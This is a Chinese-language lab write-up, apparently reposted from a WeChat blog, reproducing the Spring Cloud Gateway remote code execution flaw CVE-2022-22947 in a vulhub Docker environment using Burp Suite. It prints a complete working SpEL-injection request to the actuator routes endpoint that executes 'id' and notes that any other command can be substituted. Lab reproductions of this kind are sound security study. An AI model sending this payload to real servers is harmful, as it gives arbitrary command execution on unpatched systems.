CVE-2022-22947(远程代码执行漏洞)
环境搭建 (我的在contos上)
启动容器
docker-compose up -d //启动环境
docker-compose ps -a //查看启动的容器
绿色done 启动成功
漏洞复现
本机浏览器访问
靶机ip地址+启动容器分配的端口(8080)
再次访问首页,burp抓包
请求是get方式,转换为post请求(后面用post请求构造发送数据)
burp当前页面,鼠标右键-》Change request method
然后发送Repeater模块
重点:
修改提交数据(poc)
注意文件路径
POST /actuator/gateway/routes/fuck HTTP/1.1
Content-Type: application/json
{
"id": "fuck",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"id"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
留意标红的地方,是否有修改
刷新请求(返回他的提交poc数据的上一级路径)
修改访问路径-》添加请求数据-》注意响应状态
访问文件执行 poc文件,返回id执行结果
补充 :poc内容id可替换为其它命令
备注:
数据包有问题的可以去csdn上复制,以下是链接
https://blog.csdn.net/weixin_65722679/article/details/131359252?spm=1001.2014.3001.5501
原文始发于微信公众号(小白摸坑学网安):vulhub CVE-2022-22947(远程代码执行漏洞)复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论